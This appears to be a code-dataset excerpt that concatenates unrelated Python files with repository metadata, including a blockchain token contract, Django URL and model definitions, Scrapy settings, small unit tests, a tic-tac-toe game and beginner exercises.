if Get(ctx,SUPPLY_KEY):
Notify("Already initialized!")
return False
else:
total = TOTAL_AMOUNT * FACTOR
Put(ctx,SUPPLY_KEY,total)
Put(ctx,concat(BALANCE_PREFIX,OWNER),total)
TransferEvent("", OWNER, total)
return True
def name():
"""
:return: name of the token
"""
return NAME
def symbol():
"""
:return: symbol of the token
"""
return SYMBOL
def decimals():
"""
:return: the decimals of the token
"""
return DECIMALS
def totalSupply():
"""
:return: the total supply of the token
"""
return Get(ctx, SUPPLY_KEY)
def balanceOf(account):
"""
:param account:
:return: the token balance of account
"""
if len(account) != 20:
raise Exception("address length error")
return Get(ctx,concat(BALANCE_PREFIX,account))
def transfer(from_acct,to_acct,amount):
"""
Transfer amount of tokens from from_acct to to_acct
:param from_acct: the account from which the amount of tokens will be transferred
:param to_acct: the account to which the amount of tokens will be transferred
:param amount: the amount of the tokens to be transferred, >= 0
:return: True means success, False or raising exception means failure.
"""
if len(to_acct) != 20 or len(from_acct) != 20:
raise Exception("address length error")
if CheckWitness(from_acct) == False or amount < 0:
return False
fromKey = concat(BALANCE_PREFIX,from_acct)
fromBalance = Get(ctx,fromKey)
if amount > fromBalance:
return False
if amount == fromBalance:
Delete(ctx,fromKey)
else:
Put(ctx,fromKey,fromBalance - amount)
toKey = concat(BALANCE_PREFIX,to_acct)
toBalance = Get(ctx,toKey)
Put(ctx,toKey,toBalance + amount)
# Notify(["transfer", AddressToBase58(from_acct), AddressToBase58(to_acct), amount])
# TransferEvent(AddressToBase58(from_acct), AddressToBase58(to_acct), amount)
TransferEvent(from_acct, to_acct, amount)
return True
def transferMulti(args):
"""
:param args: the parameter is an array, containing element like [from, to, amount]
:return: True means success, False or raising exception means failure.
"""
    for p in args:
        if len(p) != 3:
            # raise (rather than return False) so the whole batch is rejected atomically
            raise Exception("transferMulti params error.")
        if transfer(p[0], p[1], p[2]) == False:
            # raise (rather than return False) so that transfers already made
            # earlier in the batch cannot succeed while later ones fail
            raise Exception("transferMulti failed.")
    return True
def approve(owner,spender,amount):
"""
owner allow spender to spend amount of token from owner account
Note here, the amount should be less than the balance of owner right now.
:param owner:
:param spender:
:param amount: amount>=0
:return: True means success, False or raising exception means failure.
"""
if len(spender) != 20 or len(owner) != 20:
raise Exception("address length error")
if CheckWitness(owner) == False:
return False
if amount > balanceOf(owner) or amount < 0:
return False
key = concat(concat(APPROVE_PREFIX,owner),spender)
Put(ctx, key, amount)
# Notify(["approval", AddressToBase58(owner), AddressToBase58(spender), amount])
# ApprovalEvent(AddressToBase58(owner), AddressToBase58(spender), amount)
ApprovalEvent(owner, spender, amount)
return True
def transferFrom(spender,from_acct,to_acct,amount):
"""
spender spends amount of tokens on the behalf of from_acct, spender makes a transaction of amount of tokens
from from_acct to to_acct
:param spender:
:param from_acct:
:param to_acct:
:param amount:
:return:
"""
if len(spender) != 20 or len(from_acct) != 20 or len(to_acct) != 20:
raise Exception("address length error")
if CheckWitness(spender) == False:
return False
fromKey = concat(BALANCE_PREFIX, from_acct)
fromBalance = Get(ctx, fromKey)
if amount > fromBalance or amount < 0:
return False
approveKey = concat(concat(APPROVE_PREFIX,from_acct),spender)
approvedAmount = Get(ctx,approveKey)
toKey = concat(BALANCE_PREFIX,to_acct)
if amount > approvedAmount:
return False
elif amount == approvedAmount:
Delete(ctx,approveKey)
Put(ctx, fromKey, fromBalance - amount)
else:
Put(ctx,approveKey,approvedAmount - amount)
Put(ctx, fromKey, fromBalance - amount)
toBalance = Get(ctx, toKey)
Put(ctx, toKey, toBalance + amount)
TransferEvent(from_acct, to_acct, amount)
return True
def allowance(owner,spender):
"""
check how many token the spender is allowed to spend from owner account
:param owner: token owner
:param spender: token spender
:return: the allowed amount of tokens
"""
key = concat(concat(APPROVE_PREFIX,owner),spender)
return Get(ctx,key)
def burn(account, amount):
if CheckWitness(account) == False or amount <= 0:
return False
if account != OWNER:
return False
acctBalance = balanceOf(account)
if acctBalance < amount:
return False
Put(ctx, concat(BALANCE_PREFIX, account), acctBalance - amount)
Put(ctx, SUPPLY_KEY, totalSupply() - amount)
TransferEvent(account, "", amount)
return True
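# Invocation sketch (an assumption for illustration, not part of the deployed
# contract): Main('init', []) must run once after deployment; afterwards e.g.
# Main('transfer', [owner_addr, to_addr, 5 * FACTOR]) moves 5 LCY and
# Main('balanceOf', [to_addr]) reads the resulting balance.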
|
[
"skyinglyh@gmail.com"
] |
skyinglyh@gmail.com
|
1804cfa845cafaff6ec953c7a7ed647e1d36d48e
|
904ff476a67cc6009c6eff83a6e81f50939e6570
|
/Practice_15_KM-04_Dubina/exp_root/root.py
|
81c71ab622932fd32a9ba7d7a7ed95e25d03ccbb
|
[] |
no_license
|
Dubina-03/Practice_university
|
70b028aac64b6719b6cab79550ff30535d01a13d
|
85731b317b766d1862e741e4dd527ae9722c9d0d
|
refs/heads/master
| 2023-02-03T14:59:40.145701
| 2020-12-24T19:27:32
| 2020-12-24T19:27:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
def root2(n):
return n**(1/2)
def root3(n):
return n**(1/3)
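# Note: both functions use floating-point exponentiation, so cube roots of
# perfect cubes are only approximate: root3(27) returns 3.0000000000000004,
# while root2(9) returns exactly 3.0.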
|
[
"noreply@github.com"
] |
Dubina-03.noreply@github.com
|
bac96bf490d83a70af03f523a3588c47d7f35390
|
1958631675a1eda1c2c5a018b636cb1117d90d9e
|
/0x0B-python-input_output/11-student.py
|
50bc5c0d66a5b52457b1d461d72eb5e1a35c3bd9
|
[] |
no_license
|
Valinor13/holbertonschool-higher_level_programming
|
f32d6507546584c3af59e3e8ece345af70a698d6
|
5fad6ea9f28f845820b5a893feb20e83ed3fe7b4
|
refs/heads/main
| 2023-06-05T21:15:29.774676
| 2021-06-27T23:08:54
| 2021-06-27T23:08:54
| 361,808,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
#!/usr/bin/python3
"""A module with the class Student"""
class Student:
"""A class that stores student with their records"""
def __init__(self, first_name, last_name, age):
self.first_name = first_name
self.last_name = last_name
self.age = age
    def to_json(self, attrs=None):
        a = {}
        if attrs is None:
            return vars(self)
        if type(attrs) is str:
            # a single attribute name: return just that attribute, without
            # falling through to the loop below (which would otherwise
            # iterate the string character by character)
            if hasattr(self, attrs):
                a[attrs] = getattr(self, attrs)
            return a
        for item in attrs:
            try:
                a[item] = getattr(self, item)
            except AttributeError:
                pass
        return a
def reload_from_json(self, json):
for k in json:
setattr(self, k, json[k])
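# A minimal usage sketch (not part of the original module):
if __name__ == "__main__":
    student = Student("John", "Doe", 23)
    print(student.to_json(["first_name", "age"]))  # {'first_name': 'John', 'age': 23}
    student.reload_from_json({"age": 24})
    print(student.age)  # 24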
|
[
"jwcalhoun2@gmail.com"
] |
jwcalhoun2@gmail.com
|
04a569fb495fa2d6b69c5e3dd372fa47ef596909
|
d59fe0cad214cb7bfca9bf2e029f3475b3c01ea9
|
/Backend-django/project/urls.py
|
df49f604eef7e03dc24917b5e1c2b0168c6eb9d1
|
[] |
no_license
|
nidheesh977/django-ecommerce
|
8a82fd41e30b7154caa9bab810064b68aba7af34
|
53eeb0b10f23a4da2944f2591ed535db34bfa0dc
|
refs/heads/master
| 2023-08-06T02:37:57.732349
| 2021-10-06T12:00:58
| 2021-10-06T12:00:58
| 405,357,396
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from rest_framework_simplejwt.views import (
TokenObtainPairView,
TokenRefreshView,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('products.urls', namespace = 'products')),
path('accounts/', include('accounts.urls', namespace = 'accounts')),
path('cart/', include('cart.urls', namespace = 'cart')),
path('checkout/', include("checkout.urls", namespace = "checkout")),
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
]
urlpatterns+=static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"bnidheesh844@gmail.com"
] |
bnidheesh844@gmail.com
|
e8c3fffdddd5e016a38f7ce0dfb435d2a43c62aa
|
a2cf879bcf9335c53157bfba71d889372fb492b8
|
/test/JsonTestResultTest.py
|
b44ee0d3744ea3faee8b5d8b32791265411c5850
|
[] |
no_license
|
colinsullivan/gaeunit
|
98ec6dc6ff0d37f2c6d89bdf2695b5049b647955
|
bab492355c69139cf1f06d14e5caa4e6ed35de39
|
refs/heads/master
| 2021-01-19T18:07:35.376204
| 2012-10-27T08:10:48
| 2012-10-27T08:10:48
| 1,329,594
| 3
| 1
| null | 2014-10-03T17:55:03
| 2011-02-04T21:18:40
|
Python
|
UTF-8
|
Python
| false
| false
| 853
|
py
|
'''
Created on May 6, 2009
@author: george
'''
import unittest
import gaeunit
class Test(unittest.TestCase):
tr = gaeunit.JsonTestResult()
    def test_list(self):
        testcase = MockTestCase()
        results = [(testcase, "error")]
        result_expected = [{"desc":"test","detail":"error"}]
        result = self.tr._list(results)
        self.assertEqual(result, result_expected)
    def test_list_special_character(self):
        testcase = MockTestCase()
        results = [(testcase, "<error>")]
        result_expected = [{"desc":"test","detail":"<error>"}]
        result = self.tr._list(results)
        self.assertEqual(result, result_expected)
class MockTestCase:
def shortDescription(self):
return "test"
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
[
"jblocksom@google.com@c3911fd6-fc52-0410-b77b-4923be2ec7be"
] |
jblocksom@google.com@c3911fd6-fc52-0410-b77b-4923be2ec7be
|
9a4d87b577fc8aa2eab994f8557c1a297f9c34b8
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/xdSKkXQkkMroNzq8C_19.py
|
66be33593f341b9f30351301eed1aa4976697558
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
"""
Create a function that counts how many D's are in a sentence.
### Examples
count_d("My friend Dylan got distracted in school.") ➞ 4
count_d("Debris was scattered all over the yard.") ➞ 3
count_d("The rodents hibernated in their den.") ➞ 3
### Notes
* Your function must be case-insensitive.
* Remember to `return` the result.
* Check the **Resources** for help.
"""
def count_d(sentence):
return sentence.lower().count("d")
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
026fc6d5be9907085f359fa45819c82d921fca1c
|
2726a4c9c5048033e75ce5f959b2716697199952
|
/allennlp/data/tokenizers/tokenizer.py
|
bd45512df3349b96124189700cd9aef2ba697c78
|
[
"Apache-2.0"
] |
permissive
|
DeNeutoy/allennlp
|
b42f2c92e3cefa489bb21f112c1bf3c922d645bd
|
ff78b093a088840d7e973f79567eec9e78269f53
|
refs/heads/master
| 2021-06-03T16:31:55.564568
| 2017-06-26T19:51:07
| 2017-06-26T19:51:07
| 95,490,219
| 0
| 0
| null | 2017-06-26T21:16:53
| 2017-06-26T21:16:53
| null |
UTF-8
|
Python
| false
| false
| 1,351
|
py
|
from typing import List
from ...common import Params
class Tokenizer:
"""
A ``Tokenizer`` splits strings of text into tokens. Typically, this either splits text into
word tokens or character tokens, and those are the two tokenizer subclasses we have implemented
here, though you could imagine wanting to do other kinds of tokenization for structured or
other inputs.
As part of tokenization, concrete implementations of this API will also handle stemming,
stopword filtering, adding start and end tokens, or other kinds of things you might want to do
to your tokens. See the parameters to, e.g., :class:`~.WordTokenizer`, or whichever tokenizer
you want to use.
If the base input to your model is words, you should use a :class:`~.WordTokenizer`, even if
you also want to have a character-level encoder to get an additional vector for each word
token. Splitting word tokens into character arrays is handled separately, in the
:class:`..token_representations.TokenRepresentation` class.
"""
def tokenize(self, text: str) -> List[str]:
"""
The only public method for this class. Actually implements splitting words into tokens.
"""
raise NotImplementedError
@classmethod
def from_params(cls, params: Params):
raise NotImplementedError
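# A minimal concrete subclass sketch (illustrative only, not part of this
# library): splits on whitespace and ignores any configuration parameters.
class WhitespaceTokenizer(Tokenizer):
    def tokenize(self, text: str) -> List[str]:
        return text.split()

    @classmethod
    def from_params(cls, params: Params):
        return cls()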
|
[
"markn@allenai.org"
] |
markn@allenai.org
|
d2dff76ec0c9bb41376698f4e3c34c73b9787c40
|
b4ea4c1bebf42c3f73cbc9a659ce1e2637584161
|
/Extract/poetryorg/poetryorg/settings.py
|
0388fb94051865d56f29fc70ccbd91b274b9805c
|
[] |
no_license
|
huiruru/FinalProject
|
436f9fccc68f7d9d62433cdc8d87df6020c73897
|
faa8732dfa2d26671c1a2e7effc034a74b83e327
|
refs/heads/master
| 2020-03-30T21:04:23.293356
| 2015-11-12T21:20:53
| 2015-11-12T21:20:53
| 42,456,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,436
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for poetryorg project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'poetryorg'
SPIDER_MODULES = ['poetryorg.spiders']
NEWSPIDER_MODULE = 'poetryorg.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY=0.25
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'poetryorg.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'poetryorg.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'poetryorg.pipelines.SomePipeline': 300,
#}
ITEM_PIPELINES = {  # pipelines run in ascending order of the priority values below
    'poetryorg.pipelines.PoetPipeline': 100,
    'poetryorg.pipelines.PoemPipeline': 200,
}
MONGODB_SERVER = "localhost"
MONGODB_PORT = 27017
MONGODB_DB = "POETRY" # db name
MONGODB_POET_COLLECTION = "POET" # collection name
MONGODB_POEM_COLLECTION = "POEM"
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
# DUPEFILTER_CLASS = 'scrapy.dupefilter.RFPDupeFilter'
|
[
"huiru.ru@gmail.com"
] |
huiru.ru@gmail.com
|
5534bee8c302e6770c1dbaf714f392f7bdadf523
|
c3a5e5b4c7e8fde13737636af2f375e7a25db470
|
/mysite/test.py
|
6b48dea5a1d10906a5fcfa561d6193eb3ef77fe6
|
[] |
no_license
|
dhouse1UNCC/ITSC3155_FALL2020_DHOUSE1
|
cd5efc42b31f82eab43d6ddb60bb8572c3134efb
|
98c42068c9ba52370f7378d391687d02458b220d
|
refs/heads/master
| 2023-01-12T02:22:28.880424
| 2020-11-19T17:25:07
| 2020-11-19T17:25:07
| 295,801,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,399
|
py
|
import unittest
import requests
class FlaskTest(unittest.TestCase):
def test_index(self):
response = requests.get("http://danhouse98.pythonanywhere.com/index")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('<h2>Use this site to maintain and organize your notes.</h2>' in response.text, True)
def test_notes(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
        self.assertEqual('Title' in response.text and 'Date' in response.text, True)
def test_note(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes/1")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('First Note' in response.text, True)
def test_new(self):
response = requests.get("http://danhouse98.pythonanywhere.com/notes/new")
statuscode = response.status_code
self.assertEqual(statuscode, 200)
self.assertEqual('<form action="new" method="post">' in response.text, True)
def test_delete(self):
response = requests.get('http://danhouse98.pythonanywhere.com/notes/delete')
statuscode = response.status_code
self.assertEqual(statuscode, 500)
if __name__ == " __main__":
unittest.main()
|
[
"dhouse1@uncc.edu"
] |
dhouse1@uncc.edu
|
19ac9c3055342b36fff5234d3553ffd56acd205a
|
cac090af84fae158a9e4c62a384578ba30b93c15
|
/final_project/manage.py
|
8826782e235fc8adbcf4ca7bbf53111ab924b33c
|
[] |
no_license
|
micnem/developers_institute
|
ed316a3754dd48ed54741387430ff1dd436ae1d9
|
aea6154a896407336c665d4ad531f124078bc001
|
refs/heads/main
| 2023-02-06T00:53:41.078983
| 2020-12-31T14:04:07
| 2020-12-31T14:04:07
| 305,331,313
| 0
| 0
| null | 2020-10-22T11:18:21
| 2020-10-19T09:29:00
|
CSS
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'splatify.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"michael.nemni@gmail.com"
] |
michael.nemni@gmail.com
|
eb7595a1ce2bbcb06c7b3e803921fbbf8d610f6f
|
2cee317ce3403399da3788428e9d724608a5a623
|
/168. Excel Sheet Column Title.py
|
58129718c9c248ad4c1649e50f7e59ea449fe2c7
|
[] |
no_license
|
justin76tan/LiCode
|
17d6ac6bb8daa47a48e9ee9ed733db6c82b8d0a5
|
13a5b291f706b0d9c4d0497186414224b4831c92
|
refs/heads/master
| 2021-09-23T17:44:40.135236
| 2018-09-26T01:00:24
| 2018-09-26T01:00:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 770
|
py
|
'''
Given a positive integer, return its corresponding column title as appear in an Excel sheet.
For example:
1 -> A
2 -> B
3 -> C
...
26 -> Z
27 -> AA
28 -> AB
...
Example 1:
Input: 1
Output: "A"
Example 2:
Input: 28
Output: "AB"
Example 3:
Input: 701
Output: "ZY"
'''
class Solution:
def convertToTitle(self, n):
"""
:type n: int
:rtype: str
"""
result = ""
while n > 0:
mod = n % 26
tmp = n // 26
if mod == 0:
mod = 26
tmp -= 1
            result += chr(mod + 64)  # 64 + mod maps 1..26 onto 'A'..'Z' (ord('A') == 65)
n = tmp
return result[::-1]
if __name__ == '__main__':
s = Solution()
print(s.convertToTitle(703))
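# Worked trace (illustrative): n=703 gives mod=1 ('A'), then n=27 gives mod=1
# ('A'), then n=1 gives mod=1 ('A'); reversing yields "AAA". The mod == 0
# branch maps to 'Z' and borrows from the next digit, e.g. 52 -> "AZ", which
# is what makes this a bijective base-26 numbering.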
|
[
"huanglili622@126.com"
] |
huanglili622@126.com
|
0fd705b4ef0964c77722152c7b5141489ffcc5a0
|
1927c781959ee9f2cc05736883b50031a3f045e1
|
/tests/__init__.py
|
567be9aceecef596ffc3e1f68d839702cba9cad6
|
[
"MIT"
] |
permissive
|
Rockbag/lenah
|
7fd7a9a1b39c158f9487eb3c21492d676e01bd05
|
820b5f8bc4f640e02fc5c15e27a5cac1dad1c788
|
refs/heads/master
| 2023-08-24T20:17:21.411859
| 2021-10-03T16:22:24
| 2021-10-03T17:34:38
| 413,131,369
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35
|
py
|
"""Unit test package for lenah."""
|
[
"balint.biro@conjura.com"
] |
balint.biro@conjura.com
|
96ad32fb43ddee22b55db2eb5af36cf2ba241e5f
|
33836016ea99776d31f7ad8f2140c39f7b43b5fe
|
/fip_collab/2016_06_10_polycrystal_FIP/plot_pc_map.py
|
b8e3ff767257cc2bd9086820e2761f0eb34a6194
|
[] |
no_license
|
earthexploration/MKS-Experimentation
|
92a2aea83e041bfe741048d662d28ff593077551
|
9b9ff3b468767b235e7c4884b0ed56c127328a5f
|
refs/heads/master
| 2023-03-17T23:11:11.313693
| 2017-04-24T19:24:35
| 2017-04-24T19:24:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,543
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from constants import const
import h5py
import sys
def pltmap(ns_set, set_id_set, pcA, pcB):
plt.figure(num=3, figsize=[9, 7])
# colormat = np.random.rand(len(set_id_set), 3)
colormat = np.array([[.3, .3, 1.],
[.3, 1., .3],
[1., .2, .2],
[0., .7, .7],
[.7, .0, .7],
[.7, .7, .0],
[.5, .3, .1],
[.3, .5, .1],
[.1, .3, .5]])
f_red = h5py.File("spatial_reduced.hdf5", 'r')
    for ii in range(len(set_id_set)):
reduced = f_red.get('reduced_%s' % set_id_set[ii])[...]
plt.plot(reduced[:, pcA], reduced[:, pcB],
marker='o', markersize=7, color=colormat[ii, :],
linestyle='', label=set_id_set[ii])
plt.plot(reduced[:, pcA].mean(), reduced[:, pcB].mean(),
marker='D', markersize=8, color=colormat[ii, :],
linestyle='')
plt.title("SVE sets in PC space")
plt.xlabel("PC%s" % str(pcA+1))
plt.ylabel("PC%s" % str(pcB+1))
plt.legend(loc='upper right', shadow=True, fontsize='medium')
plt.tight_layout()
f_red.close()
if __name__ == '__main__':
C = const()
ns_set = C['ns_val']
set_id_set = C['set_id_val']
pcA = np.int64(sys.argv[1])
pcB = np.int64(sys.argv[2])
pltmap(ns_set, set_id_set, pcA, pcB)
plt.show()
|
[
"noahhpaulson@gmail.com"
] |
noahhpaulson@gmail.com
|
c251ff0678398821b82b459cf48451a08382223d
|
954e46a8aa59bf75a3c6b8c6cf1c1807e8602349
|
/01-try-feature-extraction/07-try-feauter-selection-variance-threshold.py
|
00658ea70d1a1653bf54be6f1b78c58c1145f3c1
|
[] |
no_license
|
jiujue/try-machine-learn
|
d79b16dcfa90f046a3b27dcb3fe8a5b3f8c3bdde
|
d186c3b1bef20ddc3d382051b1967fd100baacf6
|
refs/heads/master
| 2020-08-22T06:57:36.394235
| 2019-10-20T10:08:41
| 2019-10-20T10:15:18
| 216,341,764
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
from sklearn.feature_selection import VarianceThreshold
def var():
'''
variance threshold
:return: None
'''
var = VarianceThreshold(threshold=0.0)
data = var.fit_transform([[22, 23, 24], [23, 84, 12], [22, 74, 54]])
print(data)
var = VarianceThreshold(threshold=0.1)
data = var.fit_transform([[22,23,24],[23,84,12],[22,74,54],
[22,23,24],[22,84,12],[22,74,54],
[22,23,24],[22,84,12],[22,74,54]])
print(data)
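    # Columns whose population variance is <= the threshold are dropped; here
    # the first column (eight 22s and one 23, variance ~0.099) falls under the
    # 0.1 threshold, while with threshold=0.0 only constant columns would go.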
if __name__ == '__main__':
var()
|
[
"2936435008@qq.com"
] |
2936435008@qq.com
|
48c1440f24f30794e4ca0e28ad22520598eb47f3
|
2434dac4211887bd0a3eb0f729a8c52d60c55922
|
/sessions/tictactoe/board188v1
|
84f19577b674cfcfbc894841d3192613ee1a5d91
|
[] |
no_license
|
yaminikanthch/Python-Work
|
f9c4bef85ec80acd938e53e38414c4d99d19e2c9
|
f1ba24b6d98141d5ce9807dfb9185081916785b0
|
refs/heads/master
| 2021-09-01T13:28:42.904951
| 2017-12-27T07:06:16
| 2017-12-27T07:06:16
| 115,494,761
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,068
|
#!/usr/bin/python
import sys
import os
def won(player):
cleanBoard(pos)
print "Player %s won the game!" %(player)
sys.exit()
def draw_game(dg):
cleanBoard(pos)
print "The game is a tie break!"
sys.exit()
def cleanBoard(sel):
print "\n"
print " %s | %s | %s " %(sel[0],sel[1],sel[2])
print "............."
print " %s | %s | %s " %(sel[3],sel[4],sel[5])
print "............."
print " %s | %s | %s " %(sel[6],sel[7],sel[8])
print "\n"
def winCheck(win):
    if win[0]==win[1]==win[2]=='X':
        return 'X'
elif win[3]==win[4]==win[5]=='X':
return 'X'
elif win[6]==win[7]==win[8]=='X':
return 'X'
elif win[0]==win[3]==win[6]=='X':
return 'X'
elif win[1]==win[4]==win[7]=='X':
return 'X'
elif win[2]==win[5]==win[8]=='X':
return 'X'
elif win[0]==win[4]==win[8]=='X':
return 'X'
elif win[2]==win[4]==win[6]=='X':
return 'X'
elif ((win[3]==win[4]==win[5]=='O') or (win[6]==win[7]==win[8]=='O') or (win[0]==win[3]==win[6]=='O') or (win[1]==win[4]==win[7]=='O') or (win[2]==win[5]==win[8]=='O') or (win[0]==win[4]==win[8]=='O') or (win[2]==win[4]==win[6]=='O') or (win[0]=='O' and win[1]=='O' and win[2]=='O')):
return 'O'
return False
def chooseTurn(player):
print "This is player %s turn " %(player)
if player == 'X':
player = 'O'
else:
player = 'X'
return player
pos = [" "," "," "," "," "," "," "," "," "]
pturn='X'
turn=0
while True:
    cleanBoard(pos)
    n_player = chooseTurn(pturn)
    userinput = int(raw_input("Enter your choice in the range of 1-9 : "))
    if userinput > 0 and userinput < 10:
        t = userinput - 1
        if pos[t] == " ":
            pos[t] = pturn
            pturn = n_player
            turn = turn + 1
            os.system('clear')
            # check for a win before declaring a draw, otherwise a winning
            # ninth move would wrongly end the game as a tie
            val = winCheck(pos)
            if val == 'X' or val == 'O':
                won(val)
            if turn == 9:
                draw_game(turn)
        else:
            os.system('clear')
            print "Position already in use, choose another one"
    else:
        os.system('clear')
        print "Invalid number!, please enter numbers in the range 1 to 9\n\n"
|
[
"yaminikanthch@gmail.com"
] |
yaminikanthch@gmail.com
|
|
a86dfe6fe07f66f35150fcd97337fced70d7b4dc
|
3895bb91c9d04b249ec08e3fb9015ca13865ea86
|
/book_outlet/models.py
|
85effa70be33177445109d2baeef70448a9e5075
|
[] |
no_license
|
Aaryan8751/Django_Working_With_Models
|
377af3f378461a5bcfdb02b2912cf5c4ab9190ad
|
2c72c8daf0525cc45eef4777d7052287ae56ccaf
|
refs/heads/main
| 2023-06-14T00:16:49.200095
| 2021-07-04T13:52:32
| 2021-07-04T13:52:32
| 382,821,143
| 0
| 0
| null | 2021-07-04T13:52:33
| 2021-07-04T10:17:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
from django.db import models
from django.db.models.base import Model
from django.core.validators import MinLengthValidator, MaxLengthValidator
from django.db.models.deletion import CASCADE
from django.db.models.fields.related import ForeignKey
from django.urls import reverse
from django.utils.text import slugify
# Create your models here.
class Country(models.Model):
name = models.CharField(max_length=80)
code = models.CharField(max_length=2)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "Countries"
class Address(models.Model):
street = models.CharField(max_length=80)
postal_code = models.CharField(max_length=5)
city = models.CharField(max_length=50)
def __str__(self):
return f"{self.street}, {self.postal_code}, {self.city}"
class Meta:
verbose_name_plural = "Address Entries"
class Author(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
address = models.OneToOneField(Address,on_delete=models.CASCADE,null=True)
def full_name(self):
return f"{self.first_name} {self.last_name}"
def __str__(self):
return self.full_name()
class Book(models.Model):
title = models.CharField(max_length=50)
rating = models.IntegerField()
author = models.ForeignKey(Author,on_delete=models.CASCADE,null=True,related_name="books")
is_bestselling = models.BooleanField(default=False)
